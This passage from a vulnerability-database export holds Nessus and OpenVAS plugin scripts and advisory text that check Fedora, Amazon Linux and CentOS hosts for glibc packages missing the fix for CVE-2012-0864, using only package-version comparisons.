Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=794797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-March/074691.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca822fec\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-March/074746.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f12fed9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"glibc-2.14.1-6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:23", "description": "Various bugfixes and security enhancements.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-02-29T00:00:00", "title": "Fedora 17 : glibc-2.15-23.fc17 (2012-2123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-02-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:glibc"], "id": "FEDORA_2012-2123.NASL", "href": "https://www.tenable.com/plugins/nessus/58157", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-2123.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58157);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_xref(name:\"FEDORA\", value:\"2012-2123\");\n\n script_name(english:\"Fedora 17 : glibc-2.15-23.fc17 (2012-2123)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various bugfixes and security enhancements.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=794797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-February/074042.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef34f58d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"glibc-2.15-23.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:13", "description": "An integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2012-57)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-static", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:glibc-headers"], "id": "ALA_ALAS-2012-57.NASL", "href": "https://www.tenable.com/plugins/nessus/69664", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 
checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-57.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69664);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_xref(name:\"ALAS\", value:\"2012-57\");\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2012-57)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-57.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update glibc' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.47.37.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.47.37.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:27:36", "description": "Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. 
This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 24, "published": "2012-03-20T00:00:00", "title": "CentOS 6 : glibc (CESA-2012:0393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-20T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:nscd", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2012-0393.NASL", "href": "https://www.tenable.com/plugins/nessus/58390", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0393 and \n# CentOS Errata and Security Advisory 2012:0393 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58390);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", 
value:\"2012:0393\");\n\n script_name(english:\"CentOS 6 : glibc (CESA-2012:0393)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. 
(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-March/018503.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17342915\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0864\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/15\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the 'glibc' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881169", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0393 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# 
CentOS Update for glibc CESA-2012:0393 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-March/018503.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881169\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:32:18 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0393\");\n script_name(\"CentOS Update for glibc CESA-2012:0393 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in\n an application, even though these protections are expected to limit the\n impact of such flaws to an application abort. (CVE-2012-0864)\n\n This update also fixes the following bugs:\n\n * Previously, the dynamic loader generated an incorrect ordering for\n initialization according to the ELF specification. This could result in\n incorrect ordering of DSO constructors and destructors. With this update,\n dependency resolution has been fixed. (BZ#783999)\n\n * Previously, locking of the main malloc arena was incorrect in the retry\n path. This could result in a deadlock if an sbrk request failed. With this\n update, locking of the main arena in the retry path has been fixed. This\n issue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n (BZ#795328)\n\n * Calling memcpy with overlapping arguments on certain processors would\n generate unexpected results. While such code is a clear violation of\n ANSI/ISO standards, this update restores prior memcpy behavior. 
(BZ#799259)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain patches to resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the 'glibc' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:1361412562310863924", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863924", 
"type": "openvas", "title": "Fedora Update for glibc FEDORA-2012-2162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2012-2162\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# 